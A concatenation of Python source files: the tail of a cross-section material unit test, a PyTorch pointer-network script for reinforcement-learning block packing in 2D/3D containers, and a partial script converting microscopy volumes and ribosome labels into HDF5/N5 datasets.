self.assertAlmostEqual(self.test_material.getSigmaSByGroup(1, 1), 0.1)
self.assertAlmostEqual(self.test_material.getChiByGroup(1), 1.)
self.assertAlmostEqual(self.test_material.getNuSigmaFByGroup(1), 0.0015)
if __name__ == '__main__':
unittest.main()
|
import os
import time
import argparse
import datetime
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.utils.data import DataLoader
from torch.utils.data import Dataset
import math
import itertools
from tqdm import tqdm
import tools
import generate
# from model import DRL
def get_dataset( blocks_num, train_size, valid_size, obj_dim, initial_container_width, initial_container_height, arm_size, size_range, seed=None):
blocks_num = int(blocks_num)
if seed is None:
seed = np.random.randint(123456789)
np.random.seed(seed)
if obj_dim == 2:
initial_container_size = [initial_container_width, initial_container_height]
train_dir = './data/rand_2d/pack-train-' + str(blocks_num) + '-' + str(train_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
valid_dir = './data/rand_2d/pack-valid-' + str(blocks_num) + '-' + str(valid_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
elif obj_dim == 3:
initial_container_size = [initial_container_width, initial_container_width, initial_container_height]
train_dir = './data/rand_3d/pack-train-' + str(blocks_num) + '-' + str(train_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
valid_dir = './data/rand_3d/pack-valid-' + str(blocks_num) + '-' + str(valid_size) + '-' + str(initial_container_width) + '-' + str(size_range[0]) + '-' + str(size_range[1]) + '/'
def arr2str(arr):
ret = ''
for i in range(len(arr)-1):
ret += str(arr[i]) + ' '
ret += str(arr[-1]) + '\n'
return ret
if os.path.exists(train_dir + 'blocks.txt') and os.path.exists(valid_dir + 'blocks.txt'):
return train_dir, valid_dir
if not os.path.exists(train_dir):
os.mkdir(train_dir)
if not os.path.exists(valid_dir):
os.mkdir(valid_dir)
def generate_data(data_dir, data_size):
blocks_f = open(data_dir + 'blocks.txt', 'w')
pos_f = open(data_dir + 'pos.txt', 'w')
container_f = open(data_dir + 'container.txt', 'w')
deps_move_f = open(data_dir + 'dep_move.txt', 'w')
rotate_deps_small_f = open(data_dir + 'dep_small.txt', 'w')
rotate_deps_large_f = open(data_dir + 'dep_large.txt', 'w')
for _ in tqdm(range(data_size)):
rotate_blocks, positions, deps_move, rotate_deps_small, rotate_deps_large = generate.generate_blocks(blocks_num, initial_container_size, arm_size, size_range)
for blocks_index, blocks in enumerate(rotate_blocks):
blocks_f.writelines(arr2str( blocks ) )
rotate_deps_small_f.writelines(arr2str( rotate_deps_small[blocks_index] ))
rotate_deps_large_f.writelines(arr2str( rotate_deps_large[blocks_index] ))
pos_f.writelines(arr2str( positions ) )
deps_move_f.writelines( arr2str( deps_move ) )
container_f.writelines( arr2str( np.random.random_integers(0,1, blocks_num) ) )
blocks_f.close()
rotate_deps_small_f.close()
rotate_deps_large_f.close()
pos_f.close()
deps_move_f.close()
container_f.close()
if not os.path.exists(train_dir + 'blocks.txt'):
generate_data(train_dir, train_size)
if not os.path.exists(valid_dir + 'blocks.txt'):
generate_data(valid_dir, valid_size)
return train_dir, valid_dir
class Encoder(nn.Module):
"""Encodes the static & dynamic states using 1d Convolution."""
def __init__(self, input_size, hidden_size):
super(Encoder, self).__init__()
self.conv = nn.Conv1d(input_size, int(hidden_size), kernel_size=1)
def forward(self, input):
output = self.conv(input)
return output # (batch, hidden_size, seq_len)
class HeightmapEncoder(nn.Module):
"""Encodes the static & dynamic states using 1d Convolution."""
def __init__(self, input_size, hidden_size, map_width):
super(HeightmapEncoder, self).__init__()
self.conv1 = nn.Conv2d(input_size, int(hidden_size/4), stride=2, kernel_size=1)
self.conv2 = nn.Conv2d(int(hidden_size/4), int(hidden_size/2), stride=2, kernel_size=1)
self.conv3 = nn.Conv2d(int(hidden_size/2), int(hidden_size), kernel_size= math.ceil(map_width/4))
def forward(self, input):
output = F.leaky_relu(self.conv1(input))
output = F.leaky_relu(self.conv2(output))
output = self.conv3(output).squeeze(-1)
return output # (batch, hidden_size, seq_len)
class Attention(nn.Module):
"""Calculates attention over the input nodes given the current state."""
def __init__(self, encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type):
super(Attention, self).__init__()
# W processes features from static decoder elements
self.v = nn.Parameter(torch.zeros((1, 1, decoder_hidden_size), requires_grad=True))
self.W = nn.Parameter(torch.zeros((1, decoder_hidden_size, 2 * encoder_hidden_size + decoder_hidden_size), requires_grad=True))
self.decoder_input_type = decoder_input_type
self.input_type = input_type
def forward(self, static_hidden, dynamic_hidden, decoder_hidden):
encoder_hidden = torch.cat( (static_hidden, dynamic_hidden), 1 )
batch_size, hidden_size = decoder_hidden.size()
decoder_hidden = decoder_hidden.unsqueeze(2).repeat(1, 1, static_hidden.shape[-1])
# expand_as(static_hidden)
hidden = torch.cat((encoder_hidden, decoder_hidden), 1)
# Broadcast some dimensions so we can do batch-matrix-multiply
v = self.v.expand(batch_size, 1, hidden_size)
W = self.W.expand(batch_size, hidden_size, -1)
attns = torch.bmm(v, torch.tanh(torch.bmm(W, hidden)))
attns = F.softmax(attns, dim=2) # (batch, seq_len)
return attns
class Pointer(nn.Module):
"""Calculates the next state given the previous state and input embeddings."""
def __init__(self, encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type, num_layers=1, dropout=0.2):
super(Pointer, self).__init__()
self.encoder_hidden_size = encoder_hidden_size
self.decoder_hidden_size = decoder_hidden_size
self.num_layers = num_layers
self.decoder_input_type = decoder_input_type
self.input_type = input_type
# Used to calculate probability of selecting next state
self.v = nn.Parameter(torch.zeros((1, 1, decoder_hidden_size), requires_grad=True))
self.W = nn.Parameter(torch.zeros((1, decoder_hidden_size, 4 * encoder_hidden_size), requires_grad=True))
# Used to compute a representation of the current decoder output
self.gru = nn.GRU( decoder_hidden_size, decoder_hidden_size, num_layers,
batch_first=True,
dropout=dropout if num_layers > 1 else 0)
self.encoder_attn = Attention( encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type)
self.drop_rnn = nn.Dropout(p=dropout)
self.drop_hh = nn.Dropout(p=dropout)
def forward(self, static_hidden, dynamic_hidden, decoder_hidden, last_hh):
rnn_out, last_hh = self.gru(decoder_hidden.transpose(2, 1), last_hh)
rnn_out = rnn_out.squeeze(1)
# Always apply dropout on the RNN output
rnn_out = self.drop_rnn(rnn_out)
if self.num_layers == 1:
# If > 1 layer dropout is already applied
last_hh = self.drop_hh(last_hh)
# Given a summary of the output, find an input context
enc_attn = self.encoder_attn( static_hidden, dynamic_hidden, rnn_out)
encoder_hidden = torch.cat( (static_hidden, dynamic_hidden), 1)
context = enc_attn.bmm( encoder_hidden.permute(0, 2, 1)) # (B, 1, num_feats)
# Calculate the next output using Batch-matrix-multiply ops
context = context.transpose(1, 2).expand_as( encoder_hidden )
energy = torch.cat(( encoder_hidden, context), dim=1) # (B, num_feats, seq_len)
v = self.v.expand(static_hidden.size(0), -1, -1)
W = self.W.expand(static_hidden.size(0), -1, -1)
probs = torch.bmm(v, torch.tanh(torch.bmm(W, energy))).squeeze(1)
return probs, last_hh
class DRL(nn.Module):
def __init__(self, static_size, dynamic_size, encoder_hidden_size, decoder_hidden_size,
use_cuda, input_type, allow_rot, container_width, container_height, block_dim,
reward_type, decoder_input_type, heightmap_type, packing_strategy,
containers,
update_fn, mask_fn, num_layers=1, dropout=0., unit=1):
super(DRL, self).__init__()
if dynamic_size < 1:
raise ValueError(':param dynamic_size: must be > 0, even if the '
'problem has no dynamic elements')
print(' static size: %d, dynamic size: %d' % (static_size, dynamic_size))
print(' encoder hidden size: %d' % (encoder_hidden_size))
print(' decoder hidden size: %d' % (decoder_hidden_size))
self.update_fn = update_fn
self.mask_fn = mask_fn
# Define the encoder & decoder models
self.static_encoder = Encoder(static_size, encoder_hidden_size)
self.dynamic_encoder = Encoder(dynamic_size, encoder_hidden_size)
heightmap_num = 1
if heightmap_type == 'diff':
if block_dim == 2:
heightmap_width = container_width * unit - 1
elif block_dim == 3:
heightmap_num = 2
heightmap_width = container_width * unit
heightmap_length = container_width * unit
else:
heightmap_width = container_width * unit
heightmap_length = container_width * unit
if input_type == 'mul' or input_type == 'mul-with':
if block_dim == 2:
heightmap_width = heightmap_width * 2
else:
heightmap_num = heightmap_num * 2
if decoder_input_type == 'shape_only':
self.decoder = Encoder(static_size, decoder_hidden_size)
elif decoder_input_type == 'heightmap_only':
if block_dim == 2:
self.dynamic_decoder = Encoder(heightmap_width, int(decoder_hidden_size))
elif block_dim == 3:
self.dynamic_decoder = HeightmapEncoder(heightmap_num, int(decoder_hidden_size), (heightmap_width, heightmap_length))
elif decoder_input_type == 'shape_heightmap':
self.static_decoder = Encoder(static_size, int(decoder_hidden_size/2))
if block_dim == 2:
self.dynamic_decoder = Encoder(heightmap_width, int(decoder_hidden_size/2))
elif block_dim == 3:
self.dynamic_decoder = HeightmapEncoder(heightmap_num, int(decoder_hidden_size/2), (heightmap_width, heightmap_length))
# if use_heightmap:
# if only_heightmap:
# if block_dim == 2:
# self.dynamic_decoder = Encoder(container_width, int(decoder_hidden_size))
# elif block_dim == 3:
# self.dynamic_decoder = HeightmapEncoder(1, int(decoder_hidden_size), container_width)
# else:
# self.static_decoder = Encoder(static_size, int(decoder_hidden_size/2))
# if block_dim == 2:
# self.dynamic_decoder = Encoder(container_width, int(decoder_hidden_size/2))
# elif block_dim == 3:
# self.dynamic_decoder = HeightmapEncoder(1, int(decoder_hidden_size/2), container_width)
# else:
# self.decoder = Encoder(static_size, decoder_hidden_size)
self.pointer = Pointer(encoder_hidden_size, decoder_hidden_size, decoder_input_type, input_type, num_layers, dropout)
for p in self.parameters():
if len(p.shape) > 1:
nn.init.xavier_uniform_(p)
self.encoder_hidden_size = encoder_hidden_size
self.decoder_hidden_size = decoder_hidden_size
self.use_cuda = use_cuda
self.input_type = input_type
self.allow_rot = allow_rot
self.block_dim = block_dim
self.static_size = static_size
self.dynamic_size = dynamic_size
self.reward_type = reward_type
self.container_width = container_width
self.container_height = container_height
self.decoder_input_type = decoder_input_type
self.heightmap_type = heightmap_type
self.packing_strategy = packing_strategy
self.containers = containers
def forward(self, static, dynamic, decoder_input, last_hh=None, one_step=False):
batch_size, _, sequence_size = static.size()
if self.allow_rot == False:
rotate_types = 1
else:
if self.block_dim == 2:
rotate_types = 2
elif self.block_dim == 3:
rotate_types = 6
blocks_num = int(dynamic.shape[-1] / rotate_types)
# if self.block_dim == 3:
# container_size = [self.container_width, self.container_width, self.container_height]
# else:
# container_size = [self.container_width, self.container_height]
# if self.input_type == 'mul' or self.input_type == 'mul-with':
# if self.block_dim == 3:
# container_size_a = [self.container_width, self.container_width, self.container_height]
# container_size_b = container_size_a
# else:
# container_size_a = [self.container_width, self.container_height]
# container_size_b = container_size_a
# if self.input_type == 'mul' or self.input_type == 'mul-with':
# containers_a = [tools.Container(container_size_a, blocks_num, self.reward_type, self.heightmap_type, packing_strategy=self.packing_strategy) for _ in range(batch_size)]
# containers_b = [tools.Container(container_size_b, blocks_num, self.reward_type, self.heightmap_type, packing_strategy=self.packing_strategy) for _ in range(batch_size)]
# else:
# containers = [tools.Container(container_size, blocks_num, self.reward_type, self.heightmap_type, packing_strategy=self.packing_strategy) for _ in range(batch_size)]
mask = torch.ones(batch_size, sequence_size)
if self.use_cuda:
mask = mask.cuda()
current_mask = mask.clone()
move_mask = dynamic[:, :blocks_num, :].sum(1)
rotate_small_mask = dynamic[:, blocks_num:blocks_num*2, :].sum(1)
rotate_large_mask = dynamic[:, blocks_num*2:blocks_num*3, :].sum(1)
rotate_mask = rotate_small_mask * rotate_large_mask
dynamic_mask = rotate_mask + move_mask
current_mask[ dynamic_mask.ne(0) ] = 0.
max_steps = sequence_size if self.mask_fn is None else 1000
if self.input_type == 'mul':
static_hidden = self.static_encoder(static[:,1:-1,:])
elif self.input_type == 'rot-old':
static_hidden = self.static_encoder(static)
else:
static_hidden = self.static_encoder(static[:,1:,:])
dynamic_hidden = self.dynamic_encoder(dynamic)
# if self.use_heightmap:
if 'heightmap' in self.decoder_input_type:
decoder_static, decoder_dynamic = decoder_input
if one_step == True:
max_steps = 1
for _ in range(max_steps):
if not mask.byte().any():
break
if self.decoder_input_type == 'shape_only':
decoder_hidden = self.decoder(decoder_input)
elif self.decoder_input_type == 'heightmap_only':
decoder_hidden = self.dynamic_decoder(decoder_dynamic)
elif self.decoder_input_type == 'shape_heightmap':
decoder_static_hidden = self.static_decoder(decoder_static)
decoder_dynamic_hidden = self.dynamic_decoder(decoder_dynamic)
decoder_hidden = torch.cat( (decoder_static_hidden, decoder_dynamic_hidden), 1 )
# if self.use_heightmap:
# if self.only_heightmap:
# decoder_hidden = self.dynamic_decoder(decoder_dynamic)
# else:
# decoder_static_hidden = self.static_decoder(decoder_static)
# decoder_dynamic_hidden = self.dynamic_decoder(decoder_dynamic)
# decoder_hidden = torch.cat( (decoder_static_hidden, decoder_dynamic_hidden), 1 )
# else:
# decoder_hidden = self.decoder(decoder_input)
probs, last_hh = self.pointer(static_hidden,
dynamic_hidden,
decoder_hidden, last_hh)
probs = F.softmax(probs + current_mask.log(), dim=1)
if self.training:
m = torch.distributions.Categorical(probs)
ptr = m.sample()
while not torch.gather(mask, 1, ptr.data.unsqueeze(1)).byte().all():
ptr = m.sample()
logp = m.log_prob(ptr)
else:
prob, ptr = torch.max(probs, 1) # Greedy
logp = prob.log()
# After visiting a node update the dynamic representation
if self.update_fn is not None:
dynamic = self.update_fn(dynamic, static, ptr.data, self.input_type, self.allow_rot)
dynamic_hidden = self.dynamic_encoder(dynamic)
# And update the mask so we don't re-visit if we don't need to
if self.mask_fn is not None:
current_mask, mask = self.mask_fn(mask, dynamic, static, ptr.data, self.input_type, self.allow_rot)
current_mask = current_mask.detach()
mask = mask.detach()
if self.input_type == 'mul':
static_part = static[:,1:-1,:]
elif self.input_type == 'rot-old':
static_part = static
else:
static_part = static[:,1:,:]
# if self.use_heightmap:
if 'heightmap' in self.decoder_input_type:
decoder_static = torch.gather( static_part, 2,
ptr.view(-1, 1, 1)
.expand(-1, self.static_size, 1)).detach()
is_rotate = (ptr < blocks_num).cpu().numpy().astype('bool')
blocks = decoder_static.transpose(2,1).squeeze(1).cpu().numpy()
# now get the selected blocks and update heightmap
heightmaps = []
for batch_index in range(batch_size):
heightmaps.append(self.containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] ))
# heightmaps.append(containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] ))
if self.block_dim == 2:
if self.use_cuda:
decoder_dynamic = torch.FloatTensor(heightmaps).cuda().unsqueeze(2)
else:
decoder_dynamic = torch.FloatTensor(heightmaps).unsqueeze(2)
elif self.block_dim == 3:
if self.use_cuda:
decoder_dynamic = torch.FloatTensor(heightmaps).cuda()
else:
decoder_dynamic = torch.FloatTensor(heightmaps)
if self.heightmap_type != 'diff':
decoder_dynamic = decoder_dynamic.unsqueeze(1)
else:
decoder_input = torch.gather(static_part, 2,
ptr.view(-1, 1, 1)
.expand(-1, self.static_size, 1)).detach()
# check rotate or not
is_rotate = (ptr < blocks_num).cpu().numpy().astype('bool')
# now get the selected blocks and update containers
blocks = decoder_input.transpose(2,1).squeeze(1).cpu().numpy()
for batch_index in range(batch_size):
self.containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] )
# containers[batch_index].add_new_block(blocks[batch_index], is_rotate[batch_index] )
# if self.use_heightmap:
if 'heightmap' in self.decoder_input_type:
return ptr, [decoder_static, decoder_dynamic], last_hh
return ptr, decoder_input, last_hh
class RollingDataset(object):
def __init__(self, data_file, total_blocks_num, net_blocks_num, num_samples, block_dim, seed, input_type, heightmap_type, allow_rot, \
container_width, initial_container_width, initial_container_height, mix_data_file=None, unit=1):
if seed is None:
seed = np.random.randint(123456)
np.random.seed(seed)
torch.manual_seed(seed)
deps_move = np.loadtxt(data_file + 'dep_move.txt').astype('int')
rotate_deps_small = np.loadtxt(data_file + 'dep_small.txt').astype('int')
rotate_deps_large = np.loadtxt(data_file + 'dep_large.txt').astype('int')
blocks = np.loadtxt(data_file + 'blocks.txt').astype('int')
positions = np.loadtxt(data_file + 'pos.txt').astype('int')
container_index = np.loadtxt(data_file + 'container.txt').astype('int')
rotate_types = np.math.factorial(block_dim)
data_size = int( len(blocks) / rotate_types )
blocks = blocks.reshape( data_size, -1, block_dim, total_blocks_num)
blocks = blocks.transpose(0, 1, 3, 2)
blocks = blocks.reshape( data_size, -1, block_dim )
deps_move = deps_move.reshape( len(deps_move), total_blocks_num, -1 )
deps_move = deps_move.transpose(0,2,1)
positions = positions.reshape( len(positions), -1, total_blocks_num )
positions = positions.transpose(0,2,1)
if block_dim == 2:
initial_container_size = [ initial_container_width, initial_container_height ]
elif block_dim == 3:
initial_container_size = [ initial_container_width, initial_container_width, initial_container_height ]
initial_containers = []
for batch_index in range(num_samples):
initial_container = generate.InitialContainer(blocks[batch_index], positions[batch_index], total_blocks_num, initial_container_size, True, net_blocks_num, input_type)
initial_containers.append(initial_container)
self.initial_containers = initial_containers
static_dim = block_dim
heightmap_num = 1
if heightmap_type == 'diff':
if block_dim == 2:
heightmap_width = container_width * unit - 1
elif block_dim == 3:
heightmap_num = 2
heightmap_width = container_width * unit
heightmap_length = container_width * unit
else:
heightmap_width = container_width * unit
heightmap_length = container_width * unit
if input_type == 'mul' or input_type == 'mul-with':
if block_dim == 2:
heightmap_width = heightmap_width * 2
else:
heightmap_num = heightmap_num * 2
if input_type == 'mul-with':
static_dim = static_dim + 1
if block_dim == 2:
self.decoder_static = torch.zeros(1, static_dim, 1, requires_grad=True)
self.decoder_dynamic = torch.zeros(1, heightmap_width, 1, requires_grad=True)
elif block_dim == 3:
self.decoder_static = torch.zeros(1, static_dim, 1, requires_grad=True)
self.decoder_dynamic = torch.zeros(1, heightmap_num, heightmap_width, heightmap_width, requires_grad=True)
self.num_samples = num_samples
def str2bool(v):
return v.lower() in ('true', '1')
def validate(actor, task, num_nodes, valid_data, batch_size,
reward_type, input_type,
allow_rot, obj_dim,
container_width, initial_container_width,
total_blocks_num, network_blocks_num,
use_cuda, decoder_input_type,
**kwargs):
"""Used to monitor progress on a validation set & optionally plot solution."""
actor.eval()
date = datetime.datetime.now()
now = '%s' % date.date()
now += '-%s' % date.hour
now += '-%s' % date.minute
now = str(now)
save_dir = os.path.join(task, '%d' % num_nodes,
str(obj_dim) + 'd-' + input_type + '-' + reward_type + '-width-' + str(container_width) + '-note-' + kwargs['note'] + '-' + now)
if not os.path.exists(save_dir):
os.makedirs(save_dir)
save_path = save_dir + '/render'
if not os.path.exists(save_path):
os.makedirs(save_path)
save_path = save_dir + '/render/0'
if not os.path.exists(save_path):
os.makedirs(save_path)
my_valid_size = []
my_box_size = []
my_empty_size = []
my_stable_num = []
my_packing_height = []
my_time = []
for i in tqdm(range( valid_data.num_samples )):
initial_container = valid_data.initial_containers[i]
start = time.time()
with torch.no_grad():
one_step = True
last_hh = None
decoder_static = valid_data.decoder_static
decoder_dynamic = valid_data.decoder_dynamic
# valid_size = []
# box_size = []
# empty_size = []
# stable_num = []
# packing_height = []
while one_step == True:
static, dynamic = initial_container.convert_to_input()
static = torch.FloatTensor(static).unsqueeze(0)
dynamic = torch.FloatTensor(dynamic).unsqueeze(0)
if initial_container.is_last_graph():
one_step = False
if use_cuda:
static = static.cuda()
dynamic = dynamic.cuda()
decoder_static = decoder_static.cuda()
decoder_dynamic = decoder_dynamic.cuda()
# if use_heightmap:
if 'heightmap' in decoder_input_type:
ptr, [decoder_static, decoder_dynamic], last_hh = actor(static, dynamic, [decoder_static, decoder_dynamic], last_hh, one_step)
else:
ptr, decoder_static, last_hh = actor(static, dynamic, decoder_static, last_hh, one_step)
# check actor.containers[0], if ptr can place and just stable, but overheight
# we should place in a new container
# if container is full:
# container = actor.containers[0]
# valid_size.append(container.valid_size)
# height = np.max(container.heightmap)
# if container.block_dim == 2:
# box_size = container.container_size[0] * height
# elif container.block_dim == 3:
# box_size = container.container_size[0] * container.container_size[1] * height
# box_size.append(box_size)
# empty_size.append(container.empty_size)
# stable_num.append( np.sum(container.stable) * ( network_blocks_num / total_blocks_num) )
# packing_height.append(container.bounding_box[-1])
# container.draw_container()
# container.clear_container()
# continue
# get real block id
ptr = ptr.cpu().numpy().astype('int')[0]
while ptr >= network_blocks_num:
ptr -= network_blocks_num
initial_container.remove_block( initial_container.sub_graph_nodes[ptr] )
my_time.append(time.time() - start)
container = actor.containers[0]
my_valid_size.append(container.valid_size)
height = np.max(container.heightmap)
if container.block_dim == 2:
box_size = container.container_size[0] * height
elif container.block_dim == 3:
box_size = container.container_size[0] * container.container_size[1] * height
my_box_size.append(box_size)
my_empty_size.append(container.empty_size)
my_stable_num.append( np.sum(container.stable) * ( network_blocks_num / total_blocks_num) )
my_packing_height.append(container.bounding_box[-1])
if i < 6:
container.draw_container(save_path + '/%d' % i)
actor.containers[0].clear_container()
np.savetxt( save_path + '/batch-valid_size.txt', my_valid_size)
np.savetxt( save_path + '/batch-box_size.txt', my_box_size)
np.savetxt( save_path + '/batch-empty_size.txt', my_empty_size)
np.savetxt( save_path + '/batch-stable_num.txt', my_stable_num)
np.savetxt( save_path + '/batch-packing_height.txt', my_packing_height)
np.savetxt( save_path + '/batch-time.txt', my_time)
def train_pack(args):
import pack
if args.input_type == 'simple':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'rot':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'bot' or args.input_type == 'bot-rot':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes * 3
elif args.input_type == 'mul':
STATIC_SIZE = args.obj_dim
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'mul-with':
STATIC_SIZE = args.obj_dim + 1
DYNAMIC_SIZE = args.num_nodes
elif args.input_type == 'rot-old':
STATIC_SIZE = args.obj_dim + 1
DYNAMIC_SIZE = args.num_nodes + 1
else:
print('TRAIN OHHH')
print('Loading data...')
use_cuda = args.use_cuda
size_range = [ args.min_size, args.max_size ]
if args.obj_dim == 2:
container_size = [args.container_width, args.container_height]
initial_container_size = [args.initial_container_width, args.initial_container_height]
elif args.obj_dim == 3:
container_size = [args.container_width, args.container_width, args.container_height]
initial_container_size = [args.initial_container_width, args.initial_container_width, args.initial_container_height]
containers = [tools.Container(container_size, args.total_blocks_num, args.reward_type, args.heightmap_type, \
initial_container_size, packing_strategy=args.packing_strategy)]
train_file, valid_file = get_dataset(
args.total_blocks_num,
args.train_size,
args.valid_size,
args.obj_dim,
args.initial_container_width,
args.initial_container_height,
args.arm_size,
size_range,
seed=args.seed,
)
# if args.just_generate == True:
# return
print(valid_file)
valid_data = RollingDataset(
valid_file,
args.total_blocks_num,
args.num_nodes,
args.valid_size,
args.obj_dim,
args.seed + 1,
args.input_type,
args.heightmap_type,
args.allow_rot,
args.container_width,
args.initial_container_width,
args.initial_container_height,
unit=args.unit
)
actor = DRL(STATIC_SIZE,
DYNAMIC_SIZE,
args.encoder_hidden_size,
args.decoder_hidden_size,
args.use_cuda,
args.input_type,
args.allow_rot,
args.container_width,
args.container_height,
args.obj_dim,
args.reward_type,
args.decoder_input_type,
args.heightmap_type,
args.packing_strategy,
containers,
pack.update_dynamic,
pack.update_mask,
args.num_layers,
args.dropout,
args.unit
)
if use_cuda:
actor = actor.cuda()
if args.checkpoint:
path = os.path.join(args.checkpoint, 'actor.pt')
actor.load_state_dict(torch.load(path))
print('Loading pre-train model: ', path)
kwargs = vars(args)
kwargs['valid_data'] = valid_data
kwargs['network_blocks_num'] = args.num_nodes
validate(actor, **kwargs)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Combinatorial Optimization')
# Task settings
parser.add_argument('--task', default='pack')
parser.add_argument('--note', default='rolling-debug-and-test', type=str)
parser.add_argument('--just_test', default=True, type=str2bool)
parser.add_argument('--just_generate', default=False, type=str2bool)
parser.add_argument('--use_cuda', default=True, type=str2bool)
parser.add_argument('--cuda', default='0', type=str)
parser.add_argument('--cpu_threads', default=0, type=int)
parser.add_argument('--checkpoint', default=None)
parser.add_argument('--seed', default=12345, type=int)
# Training/testing settings
parser.add_argument('--train_size',default=10, type=int)
parser.add_argument('--valid_size', default=10, type=int)
parser.add_argument('--epoch_num', default=1, type=int)
parser.add_argument('--batch_size', default=128, type=int)
# Data settings
parser.add_argument('--obj_dim', default=2, type=int)
parser.add_argument('--gt_data', default=False, type=str2bool)
parser.add_argument('--mix_data', default=False, type=str2bool)
parser.add_argument('--nodes', dest='num_nodes', default=10, type=int)
# sizes of blocks and containers
parser.add_argument('--unit', default=1, type=int)
parser.add_argument('--arm_size', default=1, type=int)
parser.add_argument('--min_size', default=1, type=int)
parser.add_argument('--max_size', default=5, type=int)
parser.add_argument('--container_width', default=5, type=int)
parser.add_argument('--container_height', default=250, type=int)
parser.add_argument('--initial_container_width', default=7, type=int)
parser.add_argument('--initial_container_height', default=250, type=int)
# Packing settings
parser.add_argument('--packing_strategy', default='LB_GREEDY', type=str)
parser.add_argument('--reward_type', default='C+P+S-lb-soft', type=str)
# Network settings
# ---- TODO: network reward
parser.add_argument('--input_type', default='bot', type=str)
parser.add_argument('--allow_rot', default=True, type=str2bool)
parser.add_argument('--decoder_input_type', default='shape_heightmap', type=str) # shape_heightmap, shape_only, heightmap_only
parser.add_argument('--heightmap_type', default='diff', type=str) # full, zero, diff
# Network parameters
parser.add_argument('--dropout', default=0.1, type=float)
parser.add_argument('--actor_lr', default=5e-4, type=float)
parser.add_argument('--critic_lr', default=5e-4, type=float)
parser.add_argument('--max_grad_norm', default=2., type=float)
parser.add_argument('--n_process_blocks', default=3, type=int)
parser.add_argument('--layers', dest='num_layers', default=1, type=int)
parser.add_argument('--encoder_hidden', dest='encoder_hidden_size', default=128, type=int)
parser.add_argument('--decoder_hidden', dest='decoder_hidden_size', default=256, type=int)
# ROLLING
parser.add_argument('--total_blocks_num', default=20, type=int)
# parser.add_argument('--use_all_gt', default=False, type=str2bool)
# parser.add_argument('--use_heightmap', default=True, type=str2bool)
# parser.add_argument('--only_heightmap', default=False, type=str2bool)
# parser.add_argument('--test', action='store_true', default=False)
args = parser.parse_args()
if args.cpu_threads != 0:
torch.set_num_threads(args.cpu_threads)
if args.task == 'pack':
print('Reward type: %s' % args.reward_type)
print('Input type: %s' % args.input_type)
print('Mix data: %s' % args.mix_data)
print('Gt data: %s' % args.gt_data)
print('Decoder input: %s' % args.decoder_input_type)
print('Heightmap_type: %s' % args.heightmap_type)
print('Target container: %s' % args.container_width)
print('Init container: %s' % args.initial_container_width)
print('Unit: %s' % args.unit)
print('Packing strategy: %s' % args.packing_strategy)
print('note: %s' % args.note)
os.environ["CUDA_VISIBLE_DEVICES"] = args.cuda
train_pack(args)
else:
raise ValueError('Task <%s> not understood'%args.task)
|
from __future__ import print_function
import z5py
import h5py
import numpy as np
import collections
import datetime
import logging
def add_ds(target, name, data, chunks, resolution, offset, **kwargs):
if name not in target:
logging.info("Writing dataset {0:} to {1:}".format(name, target.path))
ds = target.create_dataset(
name,
shape=data.shape,
chunks=chunks,
dtype=data.dtype,
compression="gzip",
type="gzip",
level=6,
)
target[name].attrs["resolution"] = resolution
target[name].attrs["offset"] = offset
target[name][:] = np.array(data)
for k in kwargs:
target[name].attrs[k] = kwargs[k]
else:
logging.info(
"Dataset {0:} already exists in {1:}, not overwriting".format(
name, target.path
)
)
ds = target[name]
return ds
def add_subset_label_ds(target, labels, name, label_ids, chunks, resolution):
if not isinstance(label_ids, collections.Iterable):
label_ids = (label_ids,)
add_ds(
target,
name,
np.logical_or.reduce([labels == lid for lid in label_ids]).astype(labels.dtype),
chunks,
resolution,
[0.0, 0.0, 0.0],
)
def contrast_adaptation(raw, min_ad, max_ad):
scale = 255.0 / (float(max_ad) - float(min_ad))
shift = -scale * float(min_ad)
return (raw * scale + shift).round().astype(np.uint8)
def main(
orig,
target,
mapping,
ribos=True,
src_label_name="volumes/labels/gt",
ribo_orig=None,
):
raw = orig["volumes/raw"]
if ribo_orig is None:
ribo_orig = orig
labels = orig[src_label_name]
if ribos:
ribosomes = ribo_orig["volumes/labels/ribosomes"]
if "volumes" not in target.keys():
target.create_group("volumes")
logging.info(
"RAW dataset {0:} has resolution {1:} and offset {2:}".format(
raw.shape, raw.attrs["resolution"], raw.attrs["offset"]
)
)
logging.info(
"LABELS dataset {0:} has resolution {1:} and offset {2:}".format(
labels.shape, labels.attrs["resolution"], labels.attrs["offset"]
)
)
if ribos:
logging.info(
"RIBOSOMES dataset {0:} has resolution {1:} and offset {2:}".format(
ribosomes.shape,
ribosomes.attrs["resolution"],
ribosomes.attrs["offset"],
)
)
cont = np.unique(labels)
hist = np.histogram(labels, bins=list(cont) + [cont[-1] + 0.1])
logging.info("LABELS contains ids {0:} in freq {1:}".format(cont, hist[0]))
if ribos:
cont_ribo = np.unique(ribosomes)
hist_ribo = np.histogram(
ribosomes, bins=list(cont_ribo) + [cont_ribo[-1] + 0.1]
)
logging.info(
"RIBOSOMES contains ids {0:} in freq {1:}".format(cont_ribo, hist_ribo[0])
)
logging.info("Doubling resolution of RAW (using nearest neighbor)")
raw_up = np.repeat(np.repeat(np.repeat(raw, 2, axis=0), 2, axis=1), 2, axis=2)
logging.info("saving upscaled RAW to {0:}".format(target.path))
add_ds(
target,
"volumes/orig_raw",
raw,
raw.chunks,
list(raw.attrs["resolution"]),
list(raw.attrs["offset"]),
)
add_ds(
target,
"volumes/raw",
raw_up,
raw.chunks,
[float(r) / 2.0 for r in raw.attrs["resolution"]],
list(raw.attrs["offset"]),
)
padding_before = (
(
(
np.array(labels.attrs["offset"])
